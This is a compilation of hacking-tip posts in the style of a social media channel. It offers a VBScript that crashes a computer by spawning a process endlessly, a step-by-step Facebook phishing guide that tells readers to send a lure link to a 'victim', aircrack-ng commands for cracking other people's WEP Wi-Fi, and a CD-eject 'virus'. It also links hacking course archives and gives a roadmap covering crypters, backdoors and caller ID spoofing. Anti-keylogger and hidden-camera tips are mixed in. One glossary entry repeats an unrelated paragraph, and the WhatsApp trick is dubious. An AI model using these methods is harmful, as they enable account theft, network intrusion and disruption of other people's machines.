HOW TO UNBLOCK YOURSELF ON WHATSAPP IF SOMEONE BLOCKS YOU!!

HOW TO UNBLOCK YOURSELF ON WHATSAPP IF SOMEONE BLOCKS YOU!!


Step 1: Write down your blocker’s phone number
If you have the contact that blocked you saved
on your phone, write it down somewhere and
delete it from your phone.

Step 2: Back up your chats
I believe you already know how to back up your
WhatsApp chat (both messages and media files).
Well, if you don’t then here is a quick guide to
creating a Google Drive backup:

✅Open WhatsApp.
Go to Menu Button > Settings > Chats > Chat
backup.

✅Tap Back up to Google Drive and set up the
backup frequency to your liking.

✅You will be prompted to select a Google
account that you will back up your chat history
to. If you do not have a Google account, tap Add
account when prompted. Please remember the
Google account you are using for the backup.

✅Tap Back up over to choose the network you
wish to use for backup. Please note that backing
up over cellular may result in additional data
charges.

Step 3: Delete your WhatsApp account
✅Go to account settings on your WhatsApp and
delete your account.
By deleting your number, it means you are no
longer active on WhatsApp so technically, you
cannot block someone who’s not on WhatsApp.
Whoever blocks you will no longer have you on
the blocked list.

Step 4: Clear WhatsApp data
✅Now go to your phone settings > app >
WhatsApp and clear the data.

Step 5: Reactivate WhatsApp
✅Open your WhatsApp and register your
number on the WhatsApp platform. This time,
you are registering for the first time over again.

Step 6: Restore Chats
✅Restore your chat back up.

✅Make sure the same Google account that
was used to perform the backup has been added
to your phone.

✅Uninstall and reinstall WhatsApp.

✅ After verifying your number, you will be
prompted to restore your messages and media
from Google Drive.

✅After the restoration process is complete,
tap Next and your chats will be displayed once
initialization is complete.

✅After restoring your chats, WhatsApp will
begin restoring your media files.

NOTE: You need to restore from the backup on
your google drive but if you didn't do so,
WhatsApp will automatically restore the backup
from your local storage memory which could be
SDcard or phone internal memory as the case
may be.

Step 7: Re-add contact
Lastly, save the contact you wrote down earlier
back on your phone. Now look for the person/
contact that blocked you in the first place and
send a message.

This is how to unlock your WhatsApp account
whenever someone blocks you.


How to crash computer with only one click.

How to crash computer with only one click.


Step1. open notepad

2.copy this codes

Dim WSHSHELL
Set
Wshshell=wscript.creatobject("wscript.shell")

Dim x
For x = 1 to 100000000
Wshshell.run "tourstart.exe"
Next save it as anything.vbs


FACEBOOK PHISHING

Requirements
1.Live internet connection
2.Phone,computer

STEPS

🔷  Launched your web browser and Open this website (http://shadowave.com/index.php)

🔹Being a new user click on sign up.Fill the form
Now select sign up and wait for the page to load

🔷 Now select any of the option available: Facebook profile Facebook app
Now create your page and fill

🔷 After filling the form select create and  select click here

🔷  Copy the link and send it to your victim

⚠ Make a smart link human hacking 😊
Eg. click on this link login into your Facebook account and get 500 likes on your photo

After sending links  you wait to get a victim if someone falls in the trap.
You log in into your shadow wave account and check here.You can enable notification
FOR EDUCATIONAL PURPOSE ONLY

How to Enable or Disable USB Ports In Windows

How to Enable or Disable USB Ports In Windows


⚜ The way to block or disable USB ports on your computer:

⚜ Altering or changing registry values to disable USB Ports.

⚜ Disabling USB ports from Device Manager.

⚜ By Uninstalling your USB Mass Storage Drivers.

⚜ Using Third-party software

⚜ Use Microsoft Support for Fixing It

⚜ So let’s have a point to point analyzing the five ways with which you can disable your USB ports on Windows 7/8 PC.

🔵 Disable or Enable USB Drivers and Mass Storage Drivers Using Registry

✅ I would prefer this method for everyone because it helps users to do the process of enabling and disabling the USB ports in fast, effective way irrespective of other methods, if the administrator is quite smart, the register setting will save more time.

1⃣ Go to desktop and press “Win Button + R“. Now  you need to type the command “Regedit” and hit the “OK”button

2⃣ Now you will be prompted to a window. So in that follow what is written
HIKEY_LOCAL_MACHINE ->SYSTEM -> CURRENT CONTROL SET -> SERVICES ->USBSTOR

3⃣ Now you have just to find out START in the working area. In that, to Disable, just change the Value data with “4” or for Next time if you want to Enable your USB port again then Change it to “3” but remember after every task or changing the value Close your Registry Editor.

HOW TO HACK ALL TYPE OF WI-FI 20I8 [BACKTRACK]⚠

HOW TO HACK ALL TYPE OF WI-FI 20I8 [BACKTRACK]⚠


Step 1:-

First Download Backtrack

Step 2:-

Burn the iso image on CD and boot your laptop from CD drive

Step 3:-

Select the third boot option(VESA/KDE).

Step 4:-

Once in BT3, click the tiny black box in the lower left corner to load up a “Konsole” window.

Step 5:-

Type the following command
airmon-ng
Note down the interface name. In this example wifi0

Step 6:-

airmon-ng stop wifi0

Step 7:-

ifconfig wifi0 down

Step 8:-

macchanger –mac 00:11:22:33:44:66 wifi0

Step 9:-

airmon-ng start wifi0

Step 10:-

airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier.
If not than don’t worry we will still crack it.

Step 11:-

airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
–bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole

Step 12:-

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful message then keep on trying until you got success.

Step 13:-

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing
or still 0 than it means no 1 is accessing that network.
But don’t worry you go an optional step,
Leave this console as it is and start new k

Step 14:-

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.

Step 15:-

aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!⚠



Download :- Evading IDS, Firewalls, and Honeypots.rar 

Download :- Hacking wireless networks.rar


Download :- Malware threats.rar


Download :- Mobile platforms.rar


Download :- Udemy-learn-kali-linux-and-hack-android-mobile-devices.rar

🔰 How To Encrypt Keyboard To Avoid Keyloggers 🔰

🔰 How To Encrypt Keyboard To Avoid Keyloggers 🔰


If we start encrypting keystrokes of a keyboard the value that keylogger will record is different from the actual value, that means they would only record random characters. We will be using Keyscrambler software to encrypt our keyboard. So have a look on simple steps below to implement this in your Windows PC.



Steps To Encrypt Keystrokes To Avoid Keylogger Attacks :-

Step 1. First of all download and install the toolKeyScrambler.

Step 2. Now after downloading, install it and after complete installation, you have to reboot your system.

Step 3. Now when your computer boots up, right click on the icon of KeyScrambler in the system tray at the bottom of a screen.

Step 4. Now choose options from there and Keyscrambler will open and you will see the screen like below.

Step 5. Now you can alter settings in this according to your wish and after that simply click on ok. Now your key scrambler app is ready, open your browser and type anything you can see that your keystrokes are being encrypted.

That’s it! you are done, now you can see this tool every time you open your browser.


Similar Type Of Softwares

Guarded ID

GuardedID eliminates your vulnerability to data theft due to keylogging attacks, a leading cause of cyber crime. StrikeForce’s patented anti-keylogging technology secures your sensitive personal and financial information by proactively encrypting every keystroke as you type. GuardedID also provides advanced anti-clickjacking and anti-screen capture technology, for multiple layers of protection from cyber attacks.

Zemana Antilogger

Zemana AntiLogger recognizes, prevents and blocks any kind of online identity theft and financial deception. Zemana AntiLogger allows you to camouflage your daily online activities-shopping, calling, texting, online banking and more, so intruders can never get a pick into it.

Oxynger KeyShield

Oxynger KeyShield is a secure, anti-screenshot and free virtual keyboard to protect passwords and other sensitive information from malicious programs and hacking. Oxynger KeyShield protects its keystrokes from keystroke logging, screen logging, mouse logging, clipboard logging and shoulder surfing.

NextGen AntiKeylogger

This is the next generation anti-keylogger program that guards your data against all types of keylogging programs both known, unknown or being developed right now. NextGen AntiKeylogger uses some unique method of protection.

Spyshelter

SpyShelter Anti-Keylogger gives trustworthy protection in real time against known and unknown “zero-day” spy and monitoring software, for example: keyloggers, screen loggers, webcam loggers, and even advanced financial malware.

Elite Anti Keylogger

With Elite Anti Keylogger you can efficiently remove keyloggers, detect spyware, trojans, worms, and other malicious software. This software helps you watch vulnerable areas of your system particularly related to other applications’ monitoring activities and detect even most advanced keyloggers.



So above is all about Encrypt Keyboard To Avoid Keyloggers. With this, you can easily protect yourself from keylogger attacks and disallow attackers to steal your Personal Identification from your computer. Hope you like this cool security tips. Do share with others too!



Download :- Evading IDS, Firewalls, and Honeypots.rar 

Download :- Hacking wireless networks.rar


Download :- Malware threats.rar


Download :- Mobile platforms.rar


Download :- Udemy-learn-kali-linux-and-hack-android-mobile-devices.rar

Hᴏᴡ Tᴏ Dᴇᴛᴇᴄᴛ A Hɪᴅᴅᴇɴ Cᴀᴍᴇʀᴀ Iɴ A Rᴏᴏᴍ

Hᴏᴡ Tᴏ Dᴇᴛᴇᴄᴛ A Hɪᴅᴅᴇɴ Cᴀᴍᴇʀᴀ Iɴ A Rᴏᴏᴍ 🔰 


1. Oᴘᴇɴ Yᴏᴜʀ Nᴏʀᴍᴀʟ SᴍᴀʀᴛPʜᴏɴᴇ

2. Oᴘᴇɴ Aɴʏ ᴏғ Tʜᴇ Cᴀᴍᴇʀᴀ Aᴘᴘ ɪɴ Tʜᴇ Pʜᴏɴᴇ

3. Oɴᴄᴇ Yᴏᴜ Hᴀᴠᴇ Oᴘᴇɴᴇᴅ Tᴜʀɴ Yᴏᴜʀ Pʜᴏɴᴇ Aʀᴏᴜɴᴅ Rᴏᴏᴍ

4. Iғ ᴀ Rᴇᴅ Dᴏᴛ Cᴏᴍᴇꜱ ɪɴ Tʜᴇ Cᴀᴍᴇʀᴀ Iᴛ Mᴇᴀɴꜱ Hɪᴅᴅᴇɴ Cᴀᴍᴇʀᴀ

5. Tʜᴀᴛ'ꜱ Hᴏᴡ Yᴏᴜ Dᴇᴛᴇᴄᴛ ᴀ Hɪᴅᴅᴇɴ Cᴀᴍᴇʀᴀ ɪɴ ᴀ Rᴏᴏᴍ

How to Clone Any Website Using HTTrack

How to Clone Any Website Using HTTrack 🔰


⚠Download & Install HTTrack

Install HTTrack by typing the following in a terminal.
sudo apt-get install httrack

When you downloaded and installed HTTrack, it placed it in the /usr/bin directory, so it should be accessible from any directory in Kali as
/usr/bin is in the PATH variable.
Lets type on the command line
    httrack --help

Then

httrack < he URL of the site> [any options] URL Filter -O < location to send copy to>

👆 points it at the website we want to copy and then direct the output (-O) to a directory on our hard drive where we want to store the website.

E.g
httrack http://www.software.com -O /tmp/webscantest


Now that we have captured and copied the entire site to our hard drive, let's take a look at it.
We can open the IceWeasel browser (or any browser) and view the contents of our copied site to the location on our hard drive. Since we copied the web site to /tmp/webscantest , we simply point our browser there and can view all the content of the website! If we point it to
/tmp/webscantest/
www.software.com/login.html , you can see  an exact copy of the login page!

MAC address spoofing..

MAC address spoofing..

1.Open your terminal, and type

ifconfig | grep HWaddr

you will see your original MAC address, mine was (not telling you😜)

2. To temporary change our MAC address, we need to turn off the network interface first by running this command

ifconfig eth0 down

3. After that we can configure the new MAC address

ifconfig eth0 hw ether 00:00:00:00:00:02

you can change the MAC address using this hexadecimal format XX:XX:XX:XX:XX:XX

4. Now we can turn on the network interface again.

ifconfig eth0 up

5. And the last we can check again our MAC whether it's change or not.



if we follow until this step, MAC address will back to default after we restart our machine. Go to next page to view how to change MAC address permanently.

6. Kali Linux was built based on Debian. In all the network interface was located on /etc/network/interfaces.

7. We will configure the /etc/network/interfaces. In this tutorial I will use pico text editor, but you can choose any of your favourite text editor.

pico /etc/network/interfaces

8. Now we will add one line of script to change our MAC address permanently

pre-up ifconfig eth0 hw ether 00:00:00:00:00:02



9. If we want to restore the default MAC address, just add the # sign in front of script in step 8.

#pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

How To Stream Windows 10 Screen On VR Android Device

🎁 How To Stream Windows 10 Screen On VR Android Device


✅ The method is quite simple but little bit time consuming and with that you can easily mirror your PC to your VR android. So follow up the steps below to proceed.

🔵 Steps To Stream Windows 10 Screen On VR Android Phone:

1⃣ First of all download and install the trinus VR windows 10 Server on the computer/Laptop.

2⃣ Now download the Trinus VR lite Client App on your Android Phone.

3⃣ Both Server and Client should be connected to the same network i.e. Connect both the computer/Laptop and Android Mobile to the Same Wi-fi Router.

4⃣ After you have installed the Trinus VR server and client app on the respective devices, Start first the Server App on the Computer, Then Launch the Trinus VR Client app on the Android device.

5⃣ Now the Server and client will try to connect to each other based upon the type of connection. Now either select the Method A (WiFi) or the Method B (USB) to get the devices Connected.

6⃣ If you are using the WiFi mode of connection, Please open the Trinus VR App on server(computer) and Client (android device)

7⃣ Now, press the start buttonon Server and wait until it detects the client automatically. If it doesn’t detect the client automatically copy the IP address.

8⃣ Now select the “IP” option on the computer and Enter the IP address of the client.

9⃣ Now click on the “OK” button. the Trinus logo will now be “Blue(Voilet)” instead of the previous grey.

✅ Thats it you are done, now you successfully streamed your normal windows screen to your android phone in VR Format. Simply navigate your mouse to change the screen streamed to your Android Phone.

⚠Create a harmless virus to continuously eject CD/DVD drives ⚠

⚠Create a harmless virus to continuously eject CD/DVD drives ⚠



1. Open notepad and copy the code given below:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

2. Save the file with any name you want and the extention .vbs (eg. Virus.vbs)
3. Double click to open the above file and your small virus will continuously eject all your connected Optical drives even if you put them back in, it will pop them out again.

P.S- To close the above virus trick, open task manager and close the wscript.exe process.

-----------

🛑🛑I AM NOT RESPONSIBLE FOR ANY DAMAGE THIS MAY CAUSE🛑🛑

Hᴏᴡ Tᴏ Iɴsᴛᴀʟʟ Kᴀʟɪ Lɪɴᴜx Oɴ Aɴʏ Aɴᴅʀᴏɪᴅ

Hᴏᴡ Tᴏ Iɴsᴛᴀʟʟ Kᴀʟɪ Lɪɴᴜx Oɴ Aɴʏ Aɴᴅʀᴏɪᴅ❓


🔰 Iɴ ᴛʜɪs ᴍᴇᴛʜᴏᴅ ʏᴏᴜ ᴡɪʟʟ ʙᴇ ɪɴsᴛᴀʟʟɪɴɢ ᴀʟʟ ᴛʜᴇ ʟɪɴᴜx ғɪʟᴇs ᴏɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ʙʏ ᴅᴏᴡɴʟᴏᴀᴅɪɴɢ ᴛʜᴇᴍ ᴀɴᴅ ᴛʜᴇɴ ᴜsɪɴɢ ᴛʜᴇ ᴄᴏᴍᴘʟᴇᴛᴇ ɪɴᴛᴇʀғᴀᴄᴇ ғᴏʀ ʏᴏᴜʀ ᴘᴇɴᴛᴇsᴛɪɴɢ ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴡᴀʏ ᴛʜᴀᴛ ʏᴏᴜ ʟɪᴋᴇ. Sᴏ ʀᴇᴀᴅ ᴏᴜᴛ ᴛʜᴇ ᴀʟʟ ᴛʜᴇ sᴛᴇᴘs ʙᴇʟᴏᴡ ᴛᴏ ᴘʀᴏᴄᴇᴇᴅ.


Rᴇǫᴜɪʀᴇᴍᴇɴᴛs:
1⃣ Fᴜʟʟʏ ᴄʜᴀʀɢᴇᴅ Aɴᴅʀᴏɪᴅ.
2⃣ Gᴏᴏᴅ Iɴᴛᴇʀɴᴇᴛ Cᴏɴɴᴇᴄᴛɪᴏɴ(Fᴏʀ Dᴏᴡɴʟᴏᴀᴅ Kᴀʟɪ Lɪɴᴜx ɪᴍᴀɢᴇs).
3⃣ Rᴏᴏᴛᴇᴅ Aɴᴅʀᴏɪᴅ.
4⃣ Aᴛʟᴇᴀsᴛ 5GB Oғ Fʀᴇᴇ Sᴘᴀᴄᴇ.

🎗 Sᴛᴇᴘs Tᴏ Iɴsᴛᴀʟʟ Kᴀʟɪ Lɪɴᴜx Oɴ Aɴʏ Aɴᴅʀᴏɪᴅ:


1⃣ Fɪʀsᴛ ᴏғ ᴀʟʟ ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅ ɪɴsᴛᴀʟʟ Lɪɴᴜx Dᴇᴘʟᴏʏ Aᴘᴘ ɪɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ғʀᴏᴍ ᴛʜᴇ Gᴏᴏɢʟᴇ Pʟᴀʏ Sᴛᴏʀᴇ.

2⃣ Nᴏᴡ Aғᴛᴇʀ ᴅᴏᴡɴʟᴏᴀᴅɪɴɢ ᴀɴᴅ ɪɴsᴛᴀʟʟɪɴɢ ɪᴛ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴀᴘᴘ ɪɴ ʏᴏᴜʀ ᴅᴇᴠɪᴄᴇ ᴀɴᴅ ᴛʜᴇʀᴇ ᴛᴀᴘ ᴏɴ Dᴏᴡɴʟᴏᴀᴅ ʙᴜᴛᴛᴏɴ.

3⃣ Nᴏᴡ ᴛʜᴇʀᴇ ᴛᴀᴘ ᴏɴ Dɪsᴛʀɪʙᴜᴛɪᴏɴ ᴏᴘᴛɪᴏɴ ᴀɴᴅ ᴄʜᴀɴɢᴇ ɪᴛ ᴛᴏ Kᴀʟɪ Lɪɴᴜx ɪɴsᴛᴇᴀᴅ ᴏғ Lɪɴᴜx.

4⃣ Nᴏᴡ sᴄʀᴏʟʟ ᴜᴘ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ Iɴsᴛᴀʟʟ ʙᴜᴛᴛᴏɴ ᴀᴛ ᴛʜᴇ ᴛᴏᴘ ᴏғ ᴛʜᴇʀᴇ.

5⃣ Nᴏᴡ ᴡᴀɪᴛ ғᴏʀ ᴛʜᴇ ᴅᴏᴡɴʟᴏᴀᴅ ᴛᴏ ᴄᴏᴍᴘʟᴇᴛᴇ ᴛɪᴍᴇ ᴛᴀᴋᴇɴ ᴄᴀɴ ʙᴇ ᴠᴀʀʏ ᴅᴇᴘᴇɴᴅɪɴɢ ᴜᴘᴏɴ ʏᴏᴜʀ ɪɴᴛᴇʀɴᴇᴛ sᴘᴇᴇᴅ.

6⃣ Nᴏᴡ ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅ ɪɴsᴛᴀʟʟ VNC Vɪᴇᴡᴇʀ Aᴘᴘ ɪɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ғʀᴏᴍ ᴛʜᴇ Pʟᴀʏ Sᴛᴏʀᴇ.

7⃣ Nᴏᴡ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴀᴘᴘ ᴀɴᴅ ғɪʟʟ ᴜᴘ ᴛʜᴇ sᴇᴛᴛɪɴɢs ᴀs ᴅɪsᴘʟᴀʏᴇᴅ ᴏɴ ᴛʜᴇ sᴄʀᴇᴇɴsʜᴏᴛ ʙᴇʟᴏᴡ.

8⃣ Nᴏᴡ ᴄʟɪᴄᴋ ᴏɴ ᴄᴏɴɴᴇᴄᴛ ʙᴜᴛᴛᴏɴ ᴛʜᴇʀᴇ.

9⃣ Tʜᴀᴛs ɪᴛ ʏᴏᴜ ᴀʀᴇ ᴅᴏɴᴇ,




HOW TO Crack Wifi Password Using Evil Twin Attack Using Wifislax


EVERYTHING you need to know to become a HACKER.

EVERYTHING you need to know to become a HACKER.


In this Article I am regrouping what ethical, black hat and grey hat hackers think are the essential skills and knowledge any pen tester should know: 
At the top you will find all the essential tools and knowledge one must learn to become efficient and skilled at penetration testing, and at the bottom, the second part explaining what each of these things are. 

PART I: THE ESSENTIALS

Some of these tutorial are simple or PoC but I strongly suggest you find books on each of these subjects before you say you understand how this works.

Start by learning how TCP/UDP works (networking): TCP and UDP
You must know the fundamentals of HTTP and how Structured Query Language databases work.
HTTP fundamentals and SQL

Learn HTML, install a Linux OS preferably KALI Linux on a virtualization program like VirtualBox (free) or VMWARE (paid).
Learn HTML
Download Kali
VirtualBox

Learn basic Debian commands to feel comfortable using KALI and download the KALI hand-book

Learn how to be anonymous using Tor, proxychains, Whonix and VPN's that don't keep logs (mullvad), MAC spoofing, DNS spoofing.
Tor || proxychains || Whonix || Mac Spoofing || DNS Spoofing

Learn to use BurpSuite, nmap, and once you really understand SQL try sqlmap.
nmap || BurpSuite || Sqlmap

Learn your way around Metasploit(=)Armitage but before that understand the different OS vulnerabilities by searching their CVE.
Metasploit Framework || CVE Website

Understand WEP/WPA/WPS, watch out for KRACK which will be released soon and we might learn how to crack WPA2.
WPA-WEP info || KRACK

Once you have understood these find out about the air-ng suite, aircrack-ng, aireplay-ng and others.
Air-ng suite - How to crack Wireless Networks

Learn how to use tamper data, sniff networks and to accomplish MITM attacks.
Tamper Data || Sniff with Wireshark || MITM

Learn about wireless adapters and their different modes.
Different modes

Learn how to "automate" vulnerability scanning with Nessus.
Nessus Guide

Learn about XSS, RFI, LFI. Don't learn how to DDoS (joking).
XSS-LFI-RFI Tutorial

Understand the ins and out of the OSI model.
Layers of OSI Model

Learn how to create a backdoor, what shells are and the definition of a 0-day.
Create a backdoor

Brute-forcing and Dictionary attacks.
Crack passwords with Hydra

Hash cracking:
Crack with John

Learn how to use google dorks (google hacking).
Google Hacking Database

Learn what are DNS, how to do whois lookups.
What is a DNS ?

Learn the most important port numbers.
Port number list

How to spoof a phone number.
Caller ID Spoofing

Research different scripting languages, check Rubber Ducky and these kind of hardware tools everybody talks about.
Rubber Ducky

Learn how to create java-drive-by's and browser based infection methods.
Java Drive By [outdated]

Understand how AV's work and how to create malwares and how to crypt them.
Basic AV detection methods || Create a Crypter

Social Engineering or how to lie. I won't discuss this here but here is a book on persuasion:
Robert Cialdini Influence and Manipulation

Once you have learned all that maybe you can start learning the advanced stuff. Of course, I hope you will become a white-hat and help people with their security instead of breaching it.

PART II: GLOSSARY

TCP/IP (Networking):
Computers themselves speak to each other across a network through the use of packets. In essence the base unit of communications in the world of computer networks is the packet. Packets themselves are most commonly built using the TCP/IP stack, which is part of the computer's operating system. Each operating system has some unique values coded into its implementation of the TCP/IP stack. This is how OS fingerprinting works, by studying these unique values such as MSS and MTU among others. It has been said before that to recognize the abnormal you must first understand what is normal. This is why we need to understand what a normal TCP/IP packet looks like and how TCP/IP itself sets up communications between computers.

Why is HTML important in pen-testing ?:
First because everything page you see on the web are displayed to some extent using HTML. It is the minimum to know the most basic language which carries the most content on internet. Also HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.

Why Kali Linux and why in a Virtual Machine(VM) ?:
First because everything page you see on the web are displayed to some extent using HTML. It is the minimum to know the most basic language which carries the most content on internet. Also HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.

Why learn Debian commands ? Don't need spoilers for that one, in my opinion it is important to know your way around the system you use and learn the basic terminal commands that are packed within.

Why use Tor, Proxychains, Whonix or a VPN ?
 During the penetration testing or vulnerability assessment or hacking, staying anonymous is one of the important factor.
If you are a black hat, you also don't want to get caught. Without it, the internet connection will reveal your identity. ProxyChains is proxifier for linux system. It allows TCP and DNS tunneling through proxies. It supports HTTP, SOCKS4 and SOCKS5 proxy servers. It uses multiple proxies at a time, so it is called Proxy Chaining. In the tutorial you will be taught to use proxychains through the Tor network.
Whonix is also a very good way to stay anonymous and makes use of the Tor network with its own gateway.
MAC Spoofing allows you to change your MAC adress which is your computer's ID. Your MAC address points to your PC's brand and can lead to you when deep searching.

Why use nmap, Burpsuite and SQLMAP ?
BurpSuite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals to identify vulnerabilities and verify attack vectors for web-based applications.

In its simplest form, Burpsuite can be classified as an Interception Proxy. A penetration tester configures their Internet browser to route traffic through the proxy which then acts as a sort of Man In The Middle by capturing and analyzing each request and response to and from the target web application. Individual HTTP requests can be paused, manipulated and replayed back to the web server for targeted analysis of parameter specific injection points. Injection points can be specified for manual as well as automated fuzzing attacks to discover potentially unintended application behaviors, crashes and error messages.

Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Why learn to use the Metasploit Framework ?: 
 Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit framework has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. It is the most renown framework used to exploit systems.

Why understand WEP/WPA ?: 
 If you want to become a professional pen-tester you will have to learn about WEP/WPA encryption because the whole wireless ecosystem resolves around these encryption, understand these will give you greater power when cracking wireless networks.

Why master the air-ng suite (use for wireless hacking) ?: 
Most if not every Wi-FI cracking methods involve using aircrack-ng. Learning how to use these tools will allow you to crack most wireless network.

Why learn how to perform MITM (man in the middle) attacks, sniff networks and tamper data?:
In a sense, a man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (computer) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to “listen in” on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can be modified in the process of transmission to try to trick the end user to divulge sensitive information, such as log in credentials. Once the user has fallen for the bait, the data is collected from the target, and the original data is then forwarded to the intended destination unaltered.

Sniffing and snooping. They refer to listening to a conversation. For example, if you login to a website that uses no encryption, your username and password can be sniffed off the network by someone who can capture the network traffic between you and the web site.

Spoofing refers to actively introducing network traffic pretending to be someone else. For example, spoofing is sending a command to computer A pretending to be computer B. It is typically used in a scenario where you generate network packets that say they originated by computer B while they really originated by computer C. Spoofing in an email context means sending an email pretending to be someone else.

Tamper Data is an add-on for Firefox that lets you view and modify HTTP requests before they are sent. It shows what information the web browser is sending on your behalf, such as cookies and hidden form fields. Use of this plugin can reveal web applications that trust the client not to misbehave.

What is Bruteforcing ?: 
A brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.

Why learn XSS, LFI, RFI ?: 
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

Remote File inclusion (RFI) refers to an inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts. The consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution.

Remote File Inclusion (RFI) usually occurs, when an application receives the path to the file that has to be included as an input without properly sanitizing it. This would allow an external URL to be supplied to the include statement.

Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application in including files on the web server by exploiting functionality that dynamically includes local files or scripts. The consequence of a successful LFI attack includes Directory Traversal and Information Disclosure as well as Remote Code Execution.

Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the include statement.

What is a backdoor in Pen-testing ?: 
Attackers can install their own backdoor on a targeted system. Doing so allows them to come and go as they please and gives them remote access to the system. Malware installed on systems for this purpose is often called a remote access Trojan, or a RAT, and can be used to install other malware on the system or exfiltrate data.








Read Also (Top 5 topics)


How To Get Access of Blocked Websites


HOW TO GET ACCESS  BLOCKED WEBSITES :


1. Recast the URL


This trick works for the sites which are hosted on VPN and on Dedicated server Environment and have an unverified SSL installed for that domain name. To get access to such websites you have to implement 2 simple steps. They are:

1. Go to the address bar of the browser (Any browser)

2. Instead of typing www.websiteURL.com or http://www.WebsiteURL.com, try typing https://www.WebsiteURL.com

So, as the domain is unverified with SSL installation, it will show up a security notice with the options as Proceed anyway or Back to Safety. Here, you have to select the option Proceed Anyway, then you will get an entry ticket to the site.


2. DNS Server Replacement

In this method you have to change or replace the DNS server to get access over the blocked websites. Say, DNS server is the container which contains all the information regarding all the sites from the entire world. So, if any country blocks any website IP from their Country IPs, they block it in their own DNS server. Whoever uses those particular DNS servers will not be able to access the blocked websites. MNC Companies, Schools, Colleges generally use this method to block the sites. To bypass this situation we have a simple trick. These methods slightly vary for different users. Just follow the steps below.

For Windows XP users


Click Start > Control Panel > Network Connections.

Now select your specific Internet connection with access problems, right-click, then select Properties.

Left-click Internet Protocol (TCP/IP), and select Properties.

Follow the instruction given below in properties.

Windows 7, 8, 8.1 and Vista Users

For Windows Vista and 7, go to Start > Control Panel > Network and Internet > Network and Sharing Center. If you’re using Windows 8, hit Windows key + C > click Search on the right-hand side > type Control Panel in the search bar > select Control Panel > Network and Internet > Network and Sharing Center.


Click Change adapter settings, which is on the left sidebar.

